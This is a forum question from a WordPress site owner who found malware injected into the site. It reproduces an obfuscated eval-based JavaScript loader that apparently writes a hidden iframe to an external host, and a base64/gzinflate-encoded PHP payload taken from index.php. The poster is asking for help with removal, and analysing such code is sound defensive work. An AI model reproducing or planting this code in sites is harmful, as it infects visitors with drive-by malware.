Possible Duplicate:
WordPress Trojan issue help!
I accessed the wordpress website I am building and received a warning about a trojan from my anti virus software. I have now checked the site with various online scanners and it appears that someone has planted an inline frame containing the code posted below…
I didnt even know wordpress could get infected in this way. Please help me out!
Here is a screenshot of the antivirus warning.
http://i.stack.imgur.com/NaSE6.png
and here is some of the malicious code script code planted on my site.
- if(window[‘d’+’o’+’c’+’u’+’m’+’ent’])aa=/\w/.exec(new
Date()).index+[];aaa=”0″;try{if(/123/.exec(“a”).index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f=”-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86″.split(‘!’);md=’a’;e=window[‘e’+’val’];w=f;s=””;fr=”f”+’ro’+’mChar’;r=ss[fr+’Code’];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);if(window[‘d’+’o’+’c’+’u’+’m’+’ent’])aa=/\w/.exec(new
Date()).index+[];aaa=”0″;try{if(/123/.exec(“a”).index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f=”-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86″.split(‘!’);md=’a’;e=window[‘e’+’val’];w=f;s=””;fr=”f”+’ro’+’mChar’;r=ss[fr+’Code’];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);
and inside the index.php
-
1583b0# echo(gzinflate(base64_decode(“1VZNc5swEP0r3VwEZbCRMJIYQi7pvYceXR8YGxIyiZ0ALelk8t+7u4jEIbabHnroDPIs0tun/XhCPm/XTX3fXdSV19fbza5fio0IxA7HGscPHHc4ym0nVn5R5PPv/XxWPpZrb1v2n74UXen5/gw9y8dgucoKhIhIZF3z6wkp51LFDn5WnDkc5ImfPa+Lbn3tPTw8+E9tm3/rmnp7lT2jT1EMsK9kFj7keSj9KhdhHAENrUHHEBqQoCUYBToCY8HgigKDMwYM6AW/GSCHlO39dQ3KgFWwSCCxBI5TMgaMhAiSlJklgSJQkChAxAItu4AxktdoTPLqjrZEnHrFWE3h4hJGglujga9TnqOp2IgocR9jhujCBJQ8sHHIiREWI6awdcIM+MQgU7DASGbUzKgHY8Fbp8RnmQmDcQXUVMuI1tHTEpcFLpXk6kuMh4tFgeEm2JSEXqWlJYQlbKSMtSMwwgnEIUXqZtF38Iq4NENZOX+Mj3NhJ16liBUDFi7DCcBwqaxyjedVk3IFNf0mbOvU1RSBWBxXEM5qKD42EOtmlPOiWDS/SsInHLfRrnTGuvaoUW/UHEPIlJkMu8YvE9iimNpoDzQSV6jHUwmNSol5N8l92QsqNMfFOBGbGdSesA+fJcXyOXGeBhFyT4dEDx4sOjrvg4iGXGjW6Z+apkdxJq4pLzUklhclo7z+Vym/yXpfkuYPehxP70SR0Qm+I0plpmNaPcG3r2HmSE/uPqr7EPRD7Z4c+aHp7kj/vXjefyLeE37s4/uv7hHDsJiegQ0hyo49H0RGOU8+AmLW3t/WnSdA+NndJheFyMp8vLhLvKh/FrdilfV5lbW5EFnV5KLC6YYu9LvL66IRWZO37bJqAnG525QIrnaNV+dRFl3UYT+7LbdX3XVWB4H/dJPXSNMGjRengfzcL29W/vE7uvRaPzufuz8UvwE=”)));
/1583b0
How can i remove this and recover the site???